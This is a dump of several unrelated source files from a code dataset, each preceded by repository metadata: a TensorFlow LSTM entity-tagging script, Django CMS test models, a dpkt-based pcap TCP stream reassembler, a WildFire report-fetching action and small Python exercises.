    Returns (correct, total): the number of matches among non-zero
    labels and the number of non-zero labels.

    Fixes: the original crashed on empty input (isinstance(lb[0], ...)
    debug print) and emitted leftover debug output on every call.
    """
    correct = 0
    total = 0
    for label, prediction in zip(lb, logit):
        label = int(label)
        if label == 0:
            continue  # padding position: excluded from the accuracy base
        total += 1
        if label == int(prediction):
            correct += 1
    return (correct, total)
#-----------------------------hyper parameters------------------------
batch_size = 99
max_sequence_length = util.max_sequence_length #default 110
word_embedding = []
word_embedding_size = 0
hidden_size = 120 #the steps of nn, means the number of sequences in an article
num_layers = 10
num_class = 5
epoch_size = 1000
check_size = 20
learning_rate = 0.01
forget_bias = 0.0
input_keep_prob = 1.0
output_keep_prob = 1.0
max_sequence_num = util.max_sequence_num
hidden_size = max_sequence_length
#--------------------------------------------------
init = 0
sess = []
correct_prediction = []
train_op = 0
accuracy = 0
tf_input = 0
tf_target = 0
#--------------------------------------------------
(data, data_ner, word_embedding) = util.loadChineseData()
(batch_size, max_sequence_length, train_set, train_lb, test_set, test_lb) = util.DivideDataSet(data, data_ner)
word_embedding.insert(0, [0 for i in range(len(word_embedding[0]))])
word_embedding_size = len(word_embedding )
word_embedding_dim = len(word_embedding[0])
#def mynet ():
tf_input = tf.placeholder(dtype=tf.int32, shape=[None, max_sequence_length])
tf_target = tf.placeholder(dtype=tf.int32, shape=[None, max_sequence_length])
#class_output = tf.nn.embedding_lookup(np.eye(5,5), tf_target)
map_nertype = [[0 if j != i else 1 for j in range(5)] for i in range(5)]
word_embedding = np.array(word_embedding, dtype=np.float32)
map_nertype = np.array(map_nertype, dtype=np.float32)
cell_input = tf.nn.embedding_lookup(word_embedding, tf_input)
class_output = tf.nn.embedding_lookup(map_nertype, tf_target)
cell_fw = tf.nn.rnn_cell.BasicLSTMCell(hidden_size, forget_bias=forget_bias, state_is_tuple=True)
cell_bk = tf.nn.rnn_cell.BasicLSTMCell(hidden_size, forget_bias=forget_bias, state_is_tuple=True, reuse=True)
#cell_fw = tf.nn.rnn_cell.DropoutWrapper(cell_fw, input_keep_prob=input_keep_prob, output_keep_prob=output_keep_prob)
#cell_bk = tf.nn.rnn_cell.DropoutWrapper(cell_bk, input_keep_prob = input_keep_prob, output_keep_prob=output_keep_prob)
cell_fw = tf.nn.rnn_cell.MultiRNNCell([cell_fw]*num_layers, state_is_tuple=True)
#cell_bk = tf.nn.rnn_cell.MultiRNNCell([cell_bk]*num_layers, state_is_tuple=True)
initial_state_fw = cell_fw.zero_state(hidden_size, dtype=tf.float32)
initial_state_bk = cell_bk.zero_state(hidden_size, dtype=tf.float32)
#inputs_list = [tf.squeeze(s, squeeze_dims=1) for s in tf.split(cell_input, num_or_size_splits=max_sequence_length, axis=1)]
inputs_list = cell_input
print(inputs_list)
# st = tf.split(cell_input, num_or_size_splits=max_sequence_length, axis=1)
# for s in st:
# inputs_list.append(s)
#outputs, state_fw, state_bw = \
# tf.nn.bidirectional_dynamic_rnn(cell_fw, cell_bk, inputs_list, initial_state_fw = initial_state_fw, initial_state_bw = initial_state_bk)
outputs, state_ = tf.nn.dynamic_rnn (cell_fw, inputs=inputs_list, initial_state=initial_state_fw)
print(outputs)
output = tf.reshape( outputs, [-1, hidden_size])
W = tf.get_variable('W', [hidden_size, num_class], dtype=tf.float32, initializer=tf.constant_initializer(2.0))
b = tf.get_variable('b', [num_class], dtype=tf.float32, initializer=tf.constant_initializer(1.0))
logits = tf.matmul(output, W) + b
labels = tf.reshape(class_output, [-1, num_class])
print ('logits', logits)
print ('labels', labels)
#loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=tf.argmax(labels, 1))
#train_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#correct_prediction = tf.equal(tf.argmax(class_output, 2), tf.argmax(logits,2))
cross_entropy = -tf.reduce_mean(labels*tf.log(tf.clip_by_value(logits, 1e-2, 1.0)))
#cross_entropy = tf.reduce_mean(tf.square(labels - logits))
train_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(cross_entropy)
arg_lb = tf.argmax(labels, 1)
arg_logit = tf.argmax(logits, 1)
#correct_prediction = tf.equal(tf.argmax(labels,1), tf.argmax(logits, 1))
#accuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))
init = tf.global_variables_initializer()
sess = tf.Session()
#if __name__ == '__main__':
#--------------------Preservation-----------------------
# (data, data_ner, word_embedding) = util.loadChineseData()
# (batch_size, train_set, train_lb, test_set, test_lb) = util.DivideDataSet(data, data_ner)
# word_embedding.insert(0, [0 for i in range(len(word_embedding[0]))])
word_embedding_size = len(word_embedding )
word_embedding_dim = len(word_embedding[0])
print(word_embedding_size, word_embedding_dim)
#----------------------Run session--------------------------
#fp = open('result.rs', 'w')
train_size = len(train_set) - 1
test_size = len(test_set) - 1
print('train_size:', train_size, 'test_size:', test_size)
sess.run(init)
for i in range(epoch_size):
tr_set = np.reshape(train_set[i%train_size], [-1, max_sequence_length])
tr_lb = np.reshape(train_lb[i%train_size], [-1, max_sequence_length])
sess.run(train_op, feed_dict={tf_input:tr_set , tf_target: tr_lb})
pass
ts_set = np.reshape(test_set[i%test_size], [-1, max_sequence_length])
ts_lb = np.reshape(test_lb[i%test_size], [-1, max_sequence_length])
#ts_set = tf.convert_to_tensor(ts_set)
#ts_lb = tf.convert_to_tensor(ts_lb)
print(type(ts_lb))
#wr = sess.run(output, feed_dict={tf_input:ts_set , tf_target: ts_lb})
#arg_lb = tf.argmax(labels, 1)
#arg_logit = tf.argmax(logits, 1)
cc = 0
tt = 0
for j in range(test_size - 1):
ts_set = np.reshape(test_set[j], [-1, max_sequence_length])
ts_lb = np.reshape(test_lb[j], [-1, max_sequence_length])
arg_lbs = sess.run(arg_lb, feed_dict={tf_input:ts_set , tf_target: ts_lb})
arg_logits = sess.run(arg_logit, feed_dict={tf_input:ts_set , tf_target: ts_lb})
c, t = cal_accurency(arg_lbs, arg_logits)
cc += c
tt += t
print('accuracy:', cc / (float)(tt))
# for i in wr:
# fp.write(str(i) + ' ')
#print('outputs', sess.run(output, feed_dict={tf_input:ts_set , tf_target: ts_lb}))
#print('loss', sess.run(cross_entropy, feed_dict={tf_input:ts_set , tf_target: ts_lb}))
#print ("epoch_size:", i, \
# sess.run(accuracy,feed_dict={tf_input: ts_set, tf_target: ts_lb}))
print('\ndone\n')
|
[
"pandigreat@163.com"
] |
pandigreat@163.com
|
be673d1dcd97eac46f96a396b361d2d97fb3ded2
|
f0700a5cdb1be9f23fd80785908e6abe757458b7
|
/deduce/config.py
|
a822809e08cbef959138864890a64eed2e1d2ce4
|
[
"MIT"
] |
permissive
|
AevoHQ/deduce
|
50a396512e3ff99b1553be452374d74f48990891
|
a94a2afa29a19b5a5e66b45de2e567eecf0cea51
|
refs/heads/master
| 2021-07-07T09:04:41.665084
| 2017-10-01T02:24:11
| 2017-10-01T02:24:11
| 105,410,586
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
"""Aevo Deduce configuration."""
import argparse
def _build_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
"--vault_ip",
help="the IP address of Aevo Vault",
default="http://localhost:3000")
return parser
ARGS = _build_parser().parse_args()
|
[
"grodinh@winchesterthurston.org"
] |
grodinh@winchesterthurston.org
|
8177c9db7f001dff1d8952ae1b336edc002bc305
|
e5ea1c22088e292d9644ba6884530eceaeb41e78
|
/dictionaries 2.py
|
34101a5085d1dfe3ccfa59f012ff0cf1ee341a12
|
[] |
no_license
|
motolanialimi/Northwestern-Data
|
1239687bd3135bcca541f4f1499ef8549a4e338f
|
4e46452b089caf9344767ca449af9b580db424ca
|
refs/heads/master
| 2020-03-14T04:07:10.029089
| 2018-04-28T19:18:13
| 2018-04-28T19:18:13
| 131,434,595
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 691
|
py
|
# Generating Email Addresses
In this activity, you will write a Python script to generate an email address using fields from a csv data file.
## Instructions
* Use csv.DictReader to read the contents of a csv file into a dictionary.
* Use the first_name and last_name keys to create a new email address using the first and last name of the employee. `{"first_name": "John", "last_name": "Glenn"}` would generate the email: `john.glenn@example.com`.
* Create a new dictionary that includes the `first_name`, `last_name`, `ssn`, and `email`.
* Append the new dictionary to a list called `new_employee_data`.
* Use csv.DictWriter to output the new_employee_data to a new csv file.
|
[
"mgbenro@gmail.com"
] |
mgbenro@gmail.com
|
e09a235d7587fa48e4b2ee716bed5829d094224c
|
a923cd0cbff345a558215256764ffde0b2c33582
|
/cms/test_utils/project/placeholderapp/models.py
|
f01b2f989921fcc4fa9c3db4c606ae423bdf4921
|
[] |
no_license
|
manufacturedba/thinkcrunch
|
9b83b78285437500ce22ab277a2a765f61aca61c
|
9bfbc32e9387af8f147c14417641261c0d66d500
|
refs/heads/master
| 2021-03-24T13:33:04.173771
| 2015-05-05T01:44:09
| 2015-05-05T01:44:09
| 17,045,023
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,082
|
py
|
from django.core.urlresolvers import reverse
from cms.utils.compat.dj import python_2_unicode_compatible
from django.db import models
from cms.models.fields import PlaceholderField
from hvad.models import TranslatableModel, TranslatedFields
def dynamic_placeholder_1(instance):
    """Slot-name resolver: the placeholder slot is the instance's char_1."""
    slot_name = instance.char_1
    return slot_name
def dynamic_placeholder_2(instance):
    """Slot-name resolver: the placeholder slot is the instance's char_2."""
    slot_name = instance.char_2
    return slot_name
class Example1(models.Model):
    """Test model: four char fields plus one placeholder."""
    char_1 = models.CharField(u'char_1', max_length=255)
    char_2 = models.CharField(u'char_2', max_length=255)
    char_3 = models.CharField(u'char_3', max_length=255)
    char_4 = models.CharField(u'char_4', max_length=255)
    placeholder = PlaceholderField('placeholder')
    def callable_item(self, request):
        """Return char_1 (presumably exercised by template callables — confirm)."""
        return self.char_1
    def __str__(self):
        return self.char_1
    def get_absolute_url(self):
        """URL of the 'detail' view for this object, keyed by pk."""
        return reverse("detail", args=(self.pk,))
class TwoPlaceholderExample(models.Model):
    """Test model with two independent placeholders on one object."""
    char_1 = models.CharField(u'char_1', max_length=255)
    char_2 = models.CharField(u'char_2', max_length=255)
    char_3 = models.CharField(u'char_3', max_length=255)
    char_4 = models.CharField(u'char_4', max_length=255)
    placeholder_1 = PlaceholderField('placeholder_1', related_name='p1')
    placeholder_2 = PlaceholderField('placeholder_2', related_name='p2')
class DynamicPlaceholderSlotExample(models.Model):
    """Test model whose placeholder slot names are computed per-instance
    (via the dynamic_placeholder_1/2 callables) instead of being fixed."""
    char_1 = models.CharField(u'char_1', max_length=255)
    char_2 = models.CharField(u'char_2', max_length=255)
    placeholder_1 = PlaceholderField(dynamic_placeholder_1, related_name='dynamic_pl_1')
    placeholder_2 = PlaceholderField(dynamic_placeholder_2, related_name='dynamic_pl_2')
@python_2_unicode_compatible
class MultilingualExample1(TranslatableModel):
    """Test model with hvad-translated char fields and one placeholder."""
    translations = TranslatedFields(
        char_1=models.CharField(u'char_1', max_length=255),
        char_2=models.CharField(u'char_2', max_length=255),
    )
    placeholder_1 = PlaceholderField('placeholder_1')
    def __str__(self):
        return self.char_1
    def get_absolute_url(self):
        """URL of the 'detail_multi' view for this object, keyed by pk."""
        return reverse("detail_multi", args=(self.pk,))
|
[
"manufacturedba@gmail.com"
] |
manufacturedba@gmail.com
|
6fe15fd3c7e16d3a37c5b48ffe8dd2b5102ea873
|
45b4fb25f4cd0e74715a2a811354ff9c45888e73
|
/Old_Py_Files/Check.py
|
12523d8dd988af9f61d33a4a2d53bf467a35ca82
|
[] |
no_license
|
Excloudx6/Measuring_Mobile_Advertisement
|
062577dd97f88b5e51b266289e613312d9c78b18
|
5790eaa04ee12a0cdc7b7752bbf29bd0c03efea6
|
refs/heads/master
| 2023-03-18T15:43:35.364235
| 2015-04-22T04:22:11
| 2015-04-22T04:22:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,349
|
py
|
#!/usr/bin/env python
import dpkt
import sys
import socket
import pcap
import zlib
import struct
def connection_id_to_str(cid, v=4):
    """Format a connection ID as a string.

    cid is (source_ip_address, source_tcp_port, destination_ip_address,
    destination_tcp_port) with packed binary addresses. v selects the
    address family: 4 -> 'ip:port=>ip:port', 6 -> 'ip.port=>ip.port'.
    Raises ValueError for any other v.
    """
    src_raw, src_port, dst_raw, dst_port = cid
    if v == 4:
        return "%s:%s=>%s:%s" % (socket.inet_ntoa(src_raw), src_port,
                                 socket.inet_ntoa(dst_raw), dst_port)
    if v == 6:
        return "%s.%s=>%s.%s" % (socket.inet_ntop(socket.AF_INET6, src_raw), src_port,
                                 socket.inet_ntop(socket.AF_INET6, dst_raw), dst_port)
    raise ValueError('Argument to connection_id_to_str must be 4 or 6, is %d' % v)
class Connection_object :
    """Holds the reassembly state of one TCP stream."""
    def __init__(self, isn, seq, string):
        # Initial sequence number; stream offsets are relative to this.
        self.isn = isn
        # Most recent sequence number observed on this connection.
        self.seq = seq
        # Maps relative sequence number -> payload bytes seen at that offset.
        self.buffer = {seq: string}
class ProtocolException(Exception):
    """Raised when a protocol inconsistency is detected while decoding
    (though a decoder bug is the more likely cause)."""
    def __init__(self, value):
        self.parameter = value
    def __str__(self):
        # Render the stored value via its repr, as the original did.
        return "%r" % (self.parameter,)
def assemble_buffer( buffer_dictionary ) :
    """Concatenate stream segments into one buffer, in offset order.

    buffer_dictionary maps byte offsets into the stream to the payload
    strings starting there. Gaps are reported (not raised) when the next
    segment does not start where the previous data ended.
    """
    return_buffer = ""
    for segment in sorted( buffer_dictionary.keys() ) :
        read_end = len(return_buffer)
        # NOTE(review): this assumes segments use 1-based offsets (next
        # segment == bytes_read + 1) — confirm against how sequence
        # offsets are stored by the caller.
        if read_end+1 != segment :
            print "There is a segment missing between %d (already read) and %d (current segment beginning)" % ( read_end, segment )
        return_buffer = return_buffer + buffer_dictionary[segment]
    return return_buffer
def get_message_segment_size(options):
    """Return the TCP Maximum Segment Size from a raw options blob, or None.

    Scans the parsed option list for kind 2 (MSS). The MSS payload is a
    big-endian unsigned 16-bit integer; common values are 1460 (IPv4,
    0x05b4) and 1440 (IPv6, 0x05a0).

    Fix: struct.unpack returns a tuple, so the original returned the
    1-tuple (mss,) instead of the integer itself.
    """
    for kind, payload in dpkt.tcp.parse_opts(options):
        if kind == 2:
            (mss,) = struct.unpack(">H", payload)
            return mss
    return None
def unpack_tcp_packet ( tcp ) :
    """Placeholder for TCP payload decoding shared by IPv4 and IPv6.

    Decoding needs more packets than are available at this point, so
    control simply returns to decode_tcp.
    """
    return None
def decode_tcp(pcap):
    """This function decodes a packet capture file pcap and breaks it up into tcp connections.

    Generator: yields (connection_id, assembled_string, ip_version) each
    time a segment with the PUSH or URG flag arrives on a known connection.
    """
    # print "counter\tsrc prt\tdst prt\tflags"
    packet_cntr = 0
    connection_table = {}  # the keys of the table are the connection ID strings: source IP,
    # source port, destination IP, destination port. The values are a tuple which is the
    # sequence number and a string which is the assembled stream
    for ts, buf in pcap:
        packet_cntr += 1
        # Also, this changes a little bit with IPv6. To tell the difference between IPv4 and IPv6, you have to look
        # at the ethertype field, which is given by http://www.iana.org/assignments/ethernet-numbers. IPv4 is 0x800 or 2048
        # and IPv6 is 0x86DD or 34525
        # This is simplistic - IPv4 packets can be fragmented. Also, this only works for IPv4. IPv6 has a different Ethertype
        # Part of the genius of dpkt is that if you have an ethernet packet with an IPv4 payload, you get an dpkt.ip object, but if you
        # have an ethernet packet with an IPv6 payload, then you get an dpkt.ip6 object, which has different fields names.
        # Note how similar IPv4 and IPv6 are.
        # NOTE(review): buf is parsed directly as an IP packet (no Ethernet
        # framing) — confirm the capture source strips link-layer headers.
        ip = dpkt.ip.IP(buf)
        if ip.p != dpkt.ip.IP_PROTO_TCP:
            print "Not Ip"
            continue
        tcp = ip.data
        print packet_cntr
        #if tcp.dport !=80 or tcp.sport !=80:
        #print "Not 80"
        #continue
        # Connection identity: (src IP, src port, dst IP, dst port).
        connection_id = (ip.src, tcp.sport, ip.dst, tcp.dport)
        # Decode each TCP flag bit into a boolean for readability below.
        fin_flag = ( tcp.flags & dpkt.tcp.TH_FIN ) != 0
        syn_flag = ( tcp.flags & dpkt.tcp.TH_SYN ) != 0
        rst_flag = ( tcp.flags & dpkt.tcp.TH_RST ) != 0
        psh_flag = ( tcp.flags & dpkt.tcp.TH_PUSH) != 0
        ack_flag = ( tcp.flags & dpkt.tcp.TH_ACK ) != 0
        urg_flag = ( tcp.flags & dpkt.tcp.TH_URG ) != 0
        ece_flag = ( tcp.flags & dpkt.tcp.TH_ECE ) != 0
        cwr_flag = ( tcp.flags & dpkt.tcp.TH_CWR ) != 0
        # The flags string is really for debugging
        # NOTE(review): `flags` is built but never used below — presumably
        # left over from the commented-out debug print; confirm before removing.
        flags = (
            ( "C" if cwr_flag else " " ) +
            ( "E" if ece_flag else " " ) +
            ( "U" if urg_flag else " " ) +
            ( "A" if ack_flag else " " ) +
            ( "P" if psh_flag else " " ) +
            ( "R" if rst_flag else " " ) +
            ( "S" if syn_flag else " " ) +
            ( "F" if fin_flag else " " ) )
        if syn_flag and not ack_flag :
            print "SYNNoACK"
            # Each TCP connection is forming. The new connection is stored as an object in a dictionary
            # whose key is the tuple (source_ip_address, source_tcp_port, destination_ip_address, destination_tcp_port)
            # The connection is stored in a dictionary. The key is the connection_id, value of each key is an object with fields for the
            # current connection state and the total of all the bytes that have been sent
            # Note that there are two connections, one from the client to the server and one from the server to the client. This becomes
            # important when the connection is closed, because one side might FIN the connection well before the other side does.
            print socket.inet_ntoa(ip.src)
            print "Forming a new connection " + connection_id_to_str( connection_id, ip.v ) + " Initial Sequence Number (ISN) is %d" % tcp.seq
            connection_table[connection_id] = Connection_object ( isn = tcp.seq, seq = tcp.seq, string = "" )
            print "Message segment size client side is ", get_message_segment_size ( tcp.opts )
        elif syn_flag and ack_flag :
            print "SYN-ACK"
            print "Server responding to a new connection " + connection_id_to_str( connection_id, ip.v ) + " Initial Sequence Number (ISN) is %d" % tcp.seq
            connection_table[connection_id] = Connection_object ( isn = tcp.seq, seq = tcp.seq, string = "" )
            print "Message segment size client side is ", get_message_segment_size ( tcp.opts )
            # This is where I am having a little confusion. My instinct tells me that the connection from the client to the server and the
            # connection from the server back to the client should be connected somehow. But they aren't, except for the SYN-ACK
            # packet. Otherwise, the source IP, destination IP, source port and destination port are mirror images, but the streams
            # are separate. The acknowlegement numbers are related, but we don't need to worry about acknowlegements
            # Technically, I don't need to test for the ACK flag since it always set.
        elif not syn_flag and ack_flag :
            print "NoSYNACK"
            sequence_number = tcp.seq
            # Ignore segments for connections whose SYN we never saw.
            if connection_id not in connection_table:
                continue
            # Relative byte offset of this segment within the stream.
            byte_offset = sequence_number - connection_table[connection_id].isn
            # Print flags+" Absolute sequence number %d ISN %d relative sequence number %d" % (sequence_number, connection_table[connection_id].isn, byte_offset)
            if tcp.sport==80 and len(tcp.data)>0:
                print "Response"
                http = dpkt.http.Response(tcp.data)
                # Decompress/decode the HTTP body before storing it in the
                # reassembly buffer, keyed by its relative offset.
                if 'content-encoding' in http.headers.keys():
                    #print "Encoded using ", http.headers['content-encoding']
                    if http.headers['content-encoding']=="gzip":
                        # 16+MAX_WBITS tells zlib to expect a gzip header.
                        connection_table[connection_id].buffer[byte_offset]=zlib.decompress(http.body, 16+zlib.MAX_WBITS)
                    else:
                        connection_table[connection_id].buffer[byte_offset]=http.body.decode(http.headers['content-encoding'],'strict')
                #connection_table[connection_id].buffer[byte_offset] = tcp.data
            elif tcp.dport==80 and len(tcp.data)>0:
                print "Request"
                http = dpkt.http.Request(tcp.data)
                #print http.method, http.uri
                print http.body
            connection_table[connection_id].seq = sequence_number
            # if the push flag or urg flag is set, then return the string to the caller, along with identifying information so that the
            # caller knows which connection is getting data returned.
            if psh_flag or urg_flag :
                connection_string = assemble_buffer( connection_table[connection_id].buffer )
                yield ( connection_id, connection_string, ip.v )
        '''else :
            # syn_flag is clear and ack_flag is clear. This is probably a software in my software.
            raise ProtocolException ( "In packet %d, SYN is clear and ACK is clear. This is terrible" % packet_cntr )'''
def main(pc) :
    """This is the outer loop that prints strings that have been captured from the TCP streams, terminated by a packet that has the PUSH flag set."""
    # decode_tcp is a generator; each yield is one pushed chunk of a stream.
    for connection_id, received_string, ip_version in decode_tcp(pc) :
        print connection_id_to_str (connection_id, ip_version)
        print received_string
if __name__ == "__main__" :
    # Usage: -i INTERFACE (live capture) or -f FILENAME (pcap file).
    # NOTE(review): when fewer/more than 3 arguments are given, nothing is
    # printed and main() is never reached — consider a usage message there too.
    if len(sys.argv) == 3 :
        if sys.argv[1] == "-i" :
            # create an interator to return the next packet. The source can be either an interface using the libpcap library or it can be a file in pcap
            # format such as created by tcpdump.
            pc = pcap.pcap( sys.argv[2] )
        elif sys.argv[1] == "-f" :
            pc = dpkt.pcap.Reader( open ( sys.argv[2] ) )
        else :
            print """Use -i INTERFACE to packet capture from an interface. Use -f FILENAME to read a packet capture file"""
            sys.exit(2)
        main(pc)
|
[
"hchawla@localhost.localdomain"
] |
hchawla@localhost.localdomain
|
49d70620d371ad7f8707c9050d28c5921813b845
|
371b3e735d34c1204e1e26391d378ba01f64fa88
|
/list_iteration.py
|
c6633b46279ed4978949bbc265761c8e6a5f6f94
|
[] |
no_license
|
phperes28/TwilioQuest_Pythonic_Temple
|
1b1509f384396e41dae64b8d50122eba1989a757
|
8c31d743093afa6df70c8b0f165fb1d27c0bede3
|
refs/heads/main
| 2023-05-02T19:22:36.249543
| 2021-05-19T22:18:15
| 2021-05-19T22:18:15
| 369,010,335
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
import sys
# Work directly on the CLI argument list, dropping the leading script
# name (list_iteration.py) so only the actual names remain.
order_of_succession = sys.argv
del order_of_succession[0]

# Print one numbered line per remaining name, counting from 1.
for position, person in enumerate(order_of_succession, start=1):
    print(f"{position}. {person}")
|
[
"noreply@github.com"
] |
phperes28.noreply@github.com
|
f0b7d7e7fc94ffb6f353f980d51003d24f13f2dc
|
5a9c19c8ff43a37549c187bd1a1f28ca3ea8c5f9
|
/Diena_1_4_thonny/d3_g2_u1.py
|
768d80ecc9c0bcea3a2e5ad03f857697aedb7ced
|
[
"MIT"
] |
permissive
|
komunikator1984/Python_RTU_08_20
|
a570e5a1b15b9289f277173245be1b189828adbf
|
773314e2586cc63fcb659aa8466bad7d3f8910c9
|
refs/heads/master
| 2023-07-22T04:24:56.544299
| 2021-08-30T18:02:38
| 2021-08-30T18:02:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
#1 Uzdevums
# temper = float(input("What is your temperature? "))
# if temper < 35:
# print('nav par aukstu')
# elif 35 <= temper <= 37:
# print('viss kārtībā')
# else:
# print('iespējams drudzis')
# Read a body temperature and classify it into three ranges.
# User-facing strings are Latvian and are left untouched; translations
# are given in the comments.
temp=float(input("Nelabi izskaties, negribi pamērīt temperatūru!"))  # prompt: "You look unwell, won't you take your temperature!"
low_temp=35  # lower bound of the normal range
high_temp=36.9  # upper bound of the normal range
if temp < low_temp:
    print ("nav par aukstu?")  # "isn't that too cold?"
elif temp >= low_temp and temp <= high_temp:
    print ("Dzīvo mierā! Viss ir kārtībā!")  # "Relax! Everything is fine!"
else: # remaining case: temp > high_temp
    print ("iespējāms drudzis")  # "possible fever"
|
[
"valdis.s.coding@gmail.com"
] |
valdis.s.coding@gmail.com
|
86646b40c2a9ea4e540a82176126cb6e6246a07d
|
3ca540f95c470007258a1e3bb4207dc9b19bae8a
|
/SCRAM/BuildSystem/BuildData.py
|
1da3fd611c44a33dabafcfb5d54830d2333d5b58
|
[
"MIT"
] |
permissive
|
cms-sw/SCRAM
|
41a23e9a1ecc3c17c1352008ab0f703aea58d406
|
e52fe9958b62fae3531fa8f62f2d554218f3fe02
|
refs/heads/SCRAMV3
| 2023-08-07T17:17:03.613656
| 2023-07-25T23:39:26
| 2023-07-25T23:39:26
| 9,367,918
| 9
| 3
|
NOASSERTION
| 2023-07-25T23:39:28
| 2013-04-11T10:38:28
|
Python
|
UTF-8
|
Python
| false
| false
| 899
|
py
|
from os.path import dirname
from os import environ
from SCRAM.BuildSystem import get_safename
class BuildData(object):
    """Build metadata for a single product, held in a 'branch' dictionary."""

    def __init__(self, bf, cdata):
        # cdata: [template/class name, path under the source dir, suffix].
        template = cdata[0]
        path = cdata[1]
        # get_safename is assumed to be pure, so compute it once and reuse
        # it for both "name" and "safepath".
        safe = get_safename(path)
        self.branch = {
            "template": template,
            "name": safe,
            "class": template.upper(),
            "safepath": safe,
            "classdir": path,
            "path": path,
            # Parent path is expressed relative to $SCRAM_SOURCEDIR.
            "parent": dirname(path)[len(environ['SCRAM_SOURCEDIR']) + 1:],
        }
        if bf:
            self.branch["metabf"] = [bf]
        self.branch["suffix"] = cdata[2]
        self.branch["context"] = {}

    def name(self):
        """Return the safe name of this build product."""
        return self.branch['name']

    def variables(self):
        """No extra variables for this data type."""
        return ""

    def branchdata(self):
        """Return the underlying branch dictionary."""
        return self.branch

    def parent(self):
        """Return the parent directory relative to the source dir."""
        return self.branch['parent']
|
[
"Shahzad.Malik.Muzaffar@cern.ch"
] |
Shahzad.Malik.Muzaffar@cern.ch
|
68244c76a59c4421feddac89c052dcdb8d338699
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_237/ch4_2019_02_26_19_03_15_156978.py
|
c0123d5ee4920cd345436ace4c8de2d22e6fb36d
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 153
|
py
|
def classifica_idade(idade):
    """Classify an age (in years) into a life-stage label.

    Returns "crianca" (child) for ages below 12, "adolescente"
    (adolescent) for ages from 12 up to but not including 18, and
    "adulto" (adult) for 18 and over.

    The original returned None for fractional ages in the open interval
    (11, 12); the boundaries are now exhaustive while preserving the
    result for every integer age.
    """
    if idade < 12:
        return "crianca"
    elif idade < 18:
        return "adolescente"
    else:
        return "adulto"
|
[
"you@example.com"
] |
you@example.com
|
889e8ac4ad1efe5805a9d7a41d93b49b525b40fa
|
46076543cb0b7d602d83dba23f6441683cabf24a
|
/PycharmProjects/aerology/__Files__/__init__.py
|
0ba9d1c19b915180aacf0ce89993c5b3896d4a52
|
[] |
no_license
|
gaurBrijesh/Python
|
5838ee7e8d427597a915e73d3f39f22ce20da9c3
|
0d97068aa95218e96e17b919def7ed2573acba2f
|
refs/heads/master
| 2021-01-25T07:48:46.844872
| 2017-07-17T10:44:14
| 2017-07-17T10:44:14
| 93,660,503
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 85
|
py
|
# Read and display the contents of the text file.  A context manager
# guarantees the handle is closed even if reading fails — the original
# opened the file and never closed it.
with open('/home/brijesh/Downloads/text.txt', 'r') as file1:
    data = file1.read()
print (data)
|
[
"nanosoft10@gmail.com"
] |
nanosoft10@gmail.com
|
81cc8e61b33e55e7f9fe5aa8e1b9ccb893a5294b
|
e3b9aa9b17ebb55e53dbc4fa9d1f49c3a56c6488
|
/paloalto_wildfire/komand_paloalto_wildfire/actions/get_report/action.py
|
0cdc2266a782da05d0b112d30b11a1bf2e0dd4a4
|
[
"MIT"
] |
permissive
|
OSSSP/insightconnect-plugins
|
ab7c77f91c46bd66b10db9da1cd7571dfc048ab7
|
846758dab745170cf1a8c146211a8bea9592e8ff
|
refs/heads/master
| 2023-04-06T23:57:28.449617
| 2020-03-18T01:24:28
| 2020-03-18T01:24:28
| 248,185,529
| 1
| 0
|
MIT
| 2023-04-04T00:12:18
| 2020-03-18T09:14:53
| null |
UTF-8
|
Python
| false
| false
| 1,615
|
py
|
import komand
from .schema import GetReportInput, GetReportOutput
# Custom imports below
import requests
import base64
class GetReport(komand.Action):
    """Action that retrieves an XML or PDF WildFire report for a sample."""

    def __init__(self):
        # NOTE: the original used super(self.__class__, self), which recurses
        # infinitely if this class is ever subclassed; name the class
        # explicitly instead.
        super(GetReport, self).__init__(
            name='get_report',
            description='Query for an XML or PDF report for a particular sample',
            input=GetReportInput(),
            output=GetReportOutput())

    def run(self, params={}):
        """Fetch the report for params['hash'] in params['format'].

        Returns a dict with the raw report content base64-encoded under
        the 'report' key.  (The mutable default for params matches the
        komand Action interface and is never mutated here.)
        """
        endpoint = "/publicapi/get/report"
        url = 'https://{}/{}'.format(self.connection.host, endpoint)
        # Each value is a (filename, content) tuple with filename=None so
        # requests serializes the request as multipart/form-data fields,
        # e.g.:
        #   Content-Disposition: form-data; name="apikey"
        #   Content-Disposition: form-data; name="format"
        req = {
            'apikey': (None, self.connection.api_key),
            'hash': (None, params.get('hash')),
            'format': (None, params.get('format'))
        }
        r = requests.post(url, files=req)
        out = base64.b64encode(r.content).decode()
        return {'report': out}

    def test(self):
        """Connectivity test stub; returns a canned report value."""
        return {'report': 'Test'}
|
[
"jonschipp@gmail.com"
] |
jonschipp@gmail.com
|
0c95a06f5f6200635c3986d24ecc5e8183e403eb
|
f9609ff4f2bbea570f3cb4cd3f9fe6b3595d4145
|
/commands/cmd_wizhelp.py
|
b0ab54a543e9859900087165a76b11ca5f6ca68b
|
[] |
no_license
|
VladThePaler/PythonWars-1996
|
2628bd2fb302faacc91688ad942799537c974f50
|
d8fbc27d90f1deb9755c0ad0e1cf2c110f406e28
|
refs/heads/master
| 2023-05-08T19:51:28.586440
| 2021-05-14T04:19:17
| 2021-05-14T04:19:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
